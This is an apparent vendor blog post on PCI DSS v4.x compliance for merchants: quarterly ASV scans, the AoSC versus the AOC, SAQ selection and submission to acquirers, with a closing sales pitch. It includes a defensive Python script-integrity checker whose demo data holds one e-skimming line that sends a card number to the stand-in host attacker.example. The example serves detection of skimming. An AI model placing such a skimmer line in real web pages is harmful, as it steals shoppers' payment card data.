Your acquiring bank or payment processor said you need a quarterly AoSC and ASV scans… now what?

When your acquiring bank or payment processor tells you to produce proof of PCI compliance or risk losing your ability to accept cards, it is not an idle threat. Acquirers are contractually required to ensure their merchants stay compliant, and card brands can fine them up to $100,000 per month for non‑compliance, so they pass those requirements down to you. PCI DSS v3.2.1 was retired on 31 March 2024 and the last future‑dated v4.0/4.0.1 requirements became mandatory on 31 March 2025, so acquirers are tightening the screws, especially on e‑commerce merchants who use redirect or iframe payment pages. The introduction of quarterly external vulnerability scans for SAQ A merchants, and the expectation that an Attestation of Scan Compliance (AoSC) be submitted after each passing scan, have caught many merchants off guard.
This post explains what your bank is really asking for: the Attestation of Scan Compliance (AoSC), a quarterly document issued by your Approved Scanning Vendor (ASV), and how it differs from the Attestation of Compliance (AOC), the annual declaration that you meet all applicable PCI DSS requirements. It walks through what your acquirer wants, why it matters and how to satisfy the requirements quickly without sacrificing security. It assumes you are a small or mid‑sized merchant rather than a large enterprise with a QSA on speed dial, but the same principles apply at any level.

Step 1 – Confirm your merchant level and SAQ type

PCI DSS assigns merchants to levels based on annual transaction volume; the thresholds are defined by the card brands and applied by your acquirer. Level 1 merchants (more than six million transactions a year) must undergo an on‑site assessment resulting in a Report on Compliance (ROC), performed by a Qualified Security Assessor (QSA) or a trained Internal Security Assessor (ISA). Level 2–4 merchants complete a Self‑Assessment Questionnaire (SAQ) annually. Quarterly ASV scans (requirement 11.3.2) apply to every merchant whose SAQ type includes that requirement, which in v4.x means SAQ A, A‑EP, B‑IP, C and D but not SAQ B, C‑VT or P2PE. Confirm your level by checking your annual card volume with your acquirer, then select the SAQ that matches how you accept cards: SAQ A covers fully outsourced e‑commerce where the payment page is a redirect or iframe served entirely by a PCI DSS compliant third party, SAQ A‑EP covers e‑commerce where your own site controls how cardholder data is sent (for example a direct‑post form), and SAQ D covers everything else, including direct API integrations where card data touches your systems. Getting the SAQ wrong means you will either do unnecessary work or miss controls your assessor or acquirer will catch.

Step 2 – Complete the SAQ or ROC

The SAQ is a series of questions that map to the 12 PCI DSS requirements; for each one you record whether the control is in place, in place with a compensating control worksheet, not applicable, not tested or not in place. It covers installing and maintaining network security controls, hardening system configurations, protecting stored cardholder data, encrypting it in transit, vulnerability management, access control, logging and monitoring, security testing and maintaining information‑security policies. Take the questions seriously: marking a control “in place” means you have implemented it and can produce evidence, and your acquirer or an assessor can ask for that evidence. If your merchant level requires a ROC, engage a QSA (or, for organizations with one, a trained Internal Security Assessor) to perform the assessment and document the evidence of compliance. The ROC will serve as the basis for your AOC.

Step 3 – Schedule quarterly external vulnerability scans

Requirement 11.3.2 of PCI DSS mandates external vulnerability scans by an Approved Scanning Vendor at least once every three months (in practice roughly every 90 days), with rescans until the report is clean. Under the ASV Program Guide any finding scored CVSS 4.0 or higher, that is medium severity and above, fails the scan, so fixing only the “high” findings is not enough. The PCI Security Standards Council added these scans to SAQ A in v4.x to combat increasing e‑skimming attacks. SecurityMetrics notes that SAQ A merchants now have 31 requirements instead of 24, and quarterly ASV scans became mandatory as soon as v3.2.1 was retired. Even if you fully outsource payments via a redirect or iframe, you must scan the web server that hosts the page containing that redirect or iframe, because attackers compromise such sites to inject skimming scripts or send shoppers to a fake payment page. Choose a PCI SSC–approved ASV from the council’s vendor list. During onboarding you will define the scope: include every public IP address and fully qualified domain name that routes to your environment, including web, mail and DNS servers, load balancers and VPN gateways; sampling is not permitted, and you will be asked to attest that the scope is complete. Do not configure your firewall or IDS/IPS to block or rate‑limit the scanner’s source addresses, since the ASV program requires the scan to see the same exposure an attacker would. Schedule each scan early in the quarter so there is time to remediate and rescan before the quarter ends. Failing to maintain four passing scans per year is grounds for non‑compliance.

Understanding AOC vs AoSC

There are two different attestation documents in the PCI world, and the acronyms are close enough that they get confused. The Attestation of Compliance (AOC) is your annual declaration summarizing the results of your PCI DSS assessment (SAQ or ROC). It is a short, signed, formal document in which you, and for a ROC your QSA as well, attest that the assessment results are accurate and that your organization meets the applicable requirements for handling payment card data.

The Attestation of Scan Compliance (AoSC, sometimes written AOSC) is issued by your Approved Scanning Vendor after each passing quarterly external scan. It is the cover sheet of the ASV scan report: a short summary stating whether your internet‑facing assets met the PCI DSS external vulnerability scanning requirement for that quarter, signed by the ASV and by you as the scan customer, who attests that the submitted scope was complete. Your acquiring bank or payment processor will ask you to submit the AoSC, usually together with the ASV scan report summary, each quarter to prove you passed. They may also request your AOC annually to verify your overall compliance status. Make sure you understand which document is being requested when you receive a notification, because a passing AoSC on its own does not make you PCI compliant.

Step 4 – Address vulnerabilities and document remediation

Scans are only the beginning. When an ASV report identifies failing findings (anything scored CVSS 4.0 or higher), correct them promptly. Typical issues include outdated web server or CMS software, weak TLS configurations (obsolete protocol versions or cipher suites), unnecessary services exposed through the firewall and missing patches. Once remediated, rerun the scan to demonstrate that the problem has been fixed; rescans are included in most ASV service fees. If a finding is a false positive or is mitigated by a compensating control, the ASV program lets you dispute it with evidence, and the ASV must review and document the exception rather than simply suppress it. Keep records of remediation actions, as your assessor will expect proof that vulnerabilities were addressed and not just ignored. For e‑commerce merchants, consider implementing script‑integrity monitoring (PCI DSS requirements 6.4.3 and 11.6.1) to detect unauthorized modifications to your payment page.

Step 5 – Compile your Attestations

There are two attestation documents you will need:

  • The Attestation of Scan Compliance (AoSC/AOSC) is issued by your Approved Scanning Vendor after you pass your quarterly external vulnerability scan. It shows whether your internet‑facing assets met the PCI DSS external scanning requirements and is required by your acquiring bank or payment processor each quarter.
  • The Attestation of Compliance (AOC) is the formal declaration that you meet all applicable PCI DSS requirements. Once your SAQ or ROC is complete and your scans have passed, the AOC is signed: for an SAQ, by a merchant executive officer; for a ROC, by the QSA as well. This annual document summarizes your assessment results and confirms you are PCI compliant.

Both documents must be sent to your acquiring bank or payment partners as part of your compliance validation. AOCs are valid for one year and must be renewed annually, while AoSCs are tied to each quarterly scan.

Step 6 – Submit your documentation to the acquirer

Once you have a clean ASV report, the associated AoSC and a signed AOC, send them to your acquiring bank or payment processor. The PCI SSC explains that merchants submit their SAQ or ROC, the AOC and their most recent quarterly ASV scan report with its AoSC to the acquirer. After reviewing your completed questionnaire, passing scan and attestations, your acquirer will record you as compliant; some also issue a compliance certificate or letter you can show business partners. Note that the PCI SSC itself does not certify merchants or issue certificates, so any such certificate is only as good as the SAQ, ROC and scans behind it. Keep copies of all submissions and confirm receipt. If your acquirer uses a compliance portal, upload your documents promptly. Do not assume that because you sent an email once, the bank considers you compliant.

Step 7 – Make compliance continuous

PCI DSS v4.0.1 shifts the mindset from annual checkboxes to continuous security. The AOC has to be renewed every 12 months, but the underlying activities occur more frequently. The standard now mandates quarterly external ASV scans (11.3.2) and quarterly internal scans (11.3.1), daily log review (10.4.1), user access reviews at least every six months (7.2.4) and, for service providers, scope confirmation every six months (12.5.2.1). Merchants using SAQ A‑EP or SAQ D must inventory, authorize and integrity‑check every script on their payment pages (6.4.3), deploy change‑ and tamper‑detection mechanisms that run at least weekly (11.6.1) and enforce multi‑factor authentication for all access into their cardholder data environment (8.4.2). Treat these tasks as ongoing operational practices, not emergencies triggered by a letter from your bank.
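The script controls mentioned in Step 4 and again here (6.4.3: inventory, authorization and integrity of payment‑page scripts; 11.6.1: change and tamper detection) come down to knowing exactly which scripts your payment page loads and noticing when one changes. The following Python program is an illustration added to this article; it is not code from the original post, from Clone Systems or from the PCI SSC. It parses a constructed sample checkout page, computes Subresource Integrity (SRI) hashes for every script, compares them against an approved baseline and reports unauthorized, modified or missing scripts. All URLs (gateway.example, cdn.example, attacker.example), script bodies and baseline hashes are made up for the demo and nothing is fetched from the network; in production you would populate the baseline from your approved script inventory and supply the fetched bodies from a headless browser or a scheduled fetch.

```python
"""Added example: payment-page script inventory and tamper check.

Illustrative code for this article (not a Clone Systems product or an official
PCI SSC tool). It models PCI DSS 6.4.3 (authorised script inventory with
integrity assurance) and 11.6.1 (change/tamper detection) in their simplest
form: hash every script the page loads and compare against a baseline.
All URLs, script bodies and hashes are constructed sample data.
"""
import base64
import hashlib
from html.parser import HTMLParser


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return a Subresource Integrity string such as 'sha384-<base64 digest>'."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


class ScriptCollector(HTMLParser):
    """Collect every <script> tag: external src, integrity attribute and inline body."""

    def __init__(self):
        super().__init__()
        self.scripts = []      # one dict per <script> element, in document order
        self._attrs = None     # attributes of the <script> currently being read
        self._body = []        # inline text chunks of that script

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._attrs = dict(attrs)
            self._body = []

    def handle_data(self, data):
        if self._attrs is not None:
            self._body.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._attrs is not None:
            self.scripts.append({
                "src": self._attrs.get("src"),
                "integrity": self._attrs.get("integrity"),
                "inline": "".join(self._body).strip(),
            })
            self._attrs = None


def audit_payment_page(html: str, baseline: dict, fetched: dict) -> list:
    """Compare the scripts on a payment page against the approved baseline.

    baseline = {"external": {src: expected SRI hash}, "inline": {SRI hashes of approved inline bodies}}
    fetched  = {src: bytes} script bodies a browser would load (supplied by the caller)
    Returns a list of findings; an empty list means the page matches the baseline.
    """
    findings = []
    collector = ScriptCollector()
    collector.feed(html)
    seen = set()
    for s in collector.scripts:
        src = s["src"]
        if src is None:  # inline script: its body is the artefact that must be approved
            h = sri_hash(s["inline"].encode("utf-8"))
            if h not in baseline["inline"]:
                findings.append(f"unauthorized inline script ({h})")
            continue
        seen.add(src)
        expected = baseline["external"].get(src)
        if expected is None:  # 6.4.3: every script needs authorisation and a business justification
            findings.append(f"unauthorized script: {src}")
            continue
        if s["integrity"] != expected:  # the tag should pin the approved hash so the browser enforces it too
            findings.append(f"missing or wrong integrity attribute on {src}")
        body = fetched.get(src)
        if body is None:
            findings.append(f"could not retrieve {src}")
        elif sri_hash(body) != expected:  # 11.6.1: content changed since the baseline was approved
            findings.append(f"content of {src} changed: {sri_hash(body)}")
    for src in baseline["external"]:
        if src not in seen:  # a script that disappeared is also a change worth alerting on
            findings.append(f"expected script absent: {src}")
    return findings


# --- constructed demo data (hypothetical gateway, CDN and attacker hosts) --------------------
GATEWAY_JS = b"window.PaymentForm = function () { /* hypothetical hosted-field loader */ };"
ANALYTICS_JS = b"window.track = function (e) { /* hypothetical analytics */ };"
INLINE_INIT = "initPaymentForm();"
# The gateway script with a skimmer appended, the shape of an e-skimming compromise.
SKIMMED_JS = GATEWAY_JS + b"\nnew Image().src='https://attacker.example/c?'+document.forms[0].cardnumber.value;"

BASELINE = {
    "external": {
        "https://gateway.example/pay.js": sri_hash(GATEWAY_JS),
        "https://cdn.example/analytics.js": sri_hash(ANALYTICS_JS),
    },
    "inline": {sri_hash(INLINE_INIT.encode("utf-8"))},
}


def demo(tampered: bool) -> list:
    """Audit a sample checkout page; with tampered=True the gateway script is skimmed and an unapproved widget appears."""
    pay_hash = BASELINE["external"]["https://gateway.example/pay.js"]
    analytics_hash = BASELINE["external"]["https://cdn.example/analytics.js"]
    widget = '<script src="https://cdn.example/chat-widget.js"></script>' if tampered else ""
    page = (
        "<html><body>\n"
        f'<script src="https://gateway.example/pay.js" integrity="{pay_hash}" crossorigin="anonymous"></script>\n'
        f'<script src="https://cdn.example/analytics.js" integrity="{analytics_hash}"></script>\n'
        f"{widget}\n"
        f"<script>{INLINE_INIT}</script>\n"
        "</body></html>"
    )
    fetched = {
        "https://gateway.example/pay.js": SKIMMED_JS if tampered else GATEWAY_JS,
        "https://cdn.example/analytics.js": ANALYTICS_JS,
        "https://cdn.example/chat-widget.js": b"/* unapproved third-party widget */",
    }
    return audit_payment_page(page, BASELINE, fetched)


if __name__ == "__main__":
    for finding in demo(tampered=True):
        print(finding)
```

Two design points worth noting. The `integrity` attribute makes the browser refuse a script whose hash has changed, which is the strongest form of 6.4.3 integrity assurance, but it only works for scripts whose vendor does not change them in place; for the ones that do, the detection side (11.6.1, at least weekly) is what catches the change, and the alert must go to someone who will act on it. Second, the check hashes the bodies as delivered to a client, so it should run from outside your network, since a skimmer injected at a CDN or by a compromised tag manager is invisible to a check that reads files from your own web root.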

Why you are being asked now

If you have processed cards for years without anyone mentioning an AOC or ASV scans, the sudden attention can feel unfair. There are three reasons it is happening now:

  1. New requirements for SAQ A merchants. PCI DSS v4.x added external ASV scans to SAQ A to combat a surge of e‑skimming attacks on merchant websites. SecurityMetrics points out that this change increased SAQ A requirements from 24 to 31 and took effect when version 3.2.1 was retired in March 2024.
  2. Tighter enforcement by banks and card brands. Acquiring banks face fines of $5,000 to $100,000 per month for non‑compliance, so they demand proof that their merchants are compliant. Non‑compliant merchants can have their ability to process card transactions restricted or revoked. Rather than waiting for an annual audit, banks increasingly require quarterly evidence.
  3. Shifting from point‑in‑time compliance to continuous security. The PCI council intentionally designed v4.0/4.0.1 to encourage continuous security. Requirements such as quarterly scans, continuous log review and script monitoring are meant to detect attacks between assessments. Expect these obligations to grow, not shrink, over time.

Beyond the basics: reducing scope and risk

Compliance is easier when there is less environment to secure. Consider using a payment gateway validated as a PCI DSS compliant Level 1 service provider that captures cardholder data on its own hosted page or hosted fields and returns a token, so the PAN never touches your systems. Routing card data through a compliant service provider can remove large portions of your environment from PCI scope and simplify future assessments, but you remain responsible for managing the provider: keep a list of the third‑party service providers you use, obtain each one’s AOC annually and agree in writing which requirements they cover and which stay with you (requirement 12.8). If you continue hosting payment pages, implement file‑ and script‑integrity monitoring, multi‑factor authentication and regular patching to reduce the risk of compromise. Document your processes, train staff and audit third‑party providers so they do not introduce vulnerabilities.

Final thoughts

Receiving an email from your acquiring bank demanding an AOC and quarterly ASV scans can feel like a threat. In reality, it is a necessary part of a payments ecosystem that is under constant attack. By understanding your obligations, conducting quarterly scans with an approved vendor, fixing vulnerabilities promptly, completing your SAQ or ROC and submitting your AOC on schedule, you will not only keep the card brands happy but also significantly reduce your risk of a costly data breach. Compliance is not a one‑time exercise; it is a discipline. Treat it like routine maintenance rather than a crisis and you will rarely have to worry about a suspension notice again. Clone Systems can help you through every step, from selecting an ASV to interpreting scan results and preparing your AOC. With the right process in place, the next call from your acquirer will be an easy one.

Get compliant today

The quarterly external scans described in this article generate an Attestation of Scan Compliance (AoSC) and set you up to produce your annual Attestation of Compliance (AOC).
If your compliance deadline is looming, Clone Systems can help you meet it fast. Their PCI ASV Certified Scans are delivered through a secure, single‑tenant web portal and require no software installation, so you can purchase online and start scanning immediately, getting your AoSC the same day. Packages start at $185 per year for scanning a single IP address or domain and scale to $625 per year for ten IPs or domains or $1,575 per year for twenty‑five IPs or domains. Every plan includes an online SAQ v4.0.1 wizard, certified ASV compliance reports, website trust seals and unlimited re‑scans until you pass.

Visit Clone Systems’ purchase page to select the package that fits your scope and obtain your AoSC today, so you are one step closer to your AOC. https://www.clone-systems.com/purchase-pci-compliance-scanning/
